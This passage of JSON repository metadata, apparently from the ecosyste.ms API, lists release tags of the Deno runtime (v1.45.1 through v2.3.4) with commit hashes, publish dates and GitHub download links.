no/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null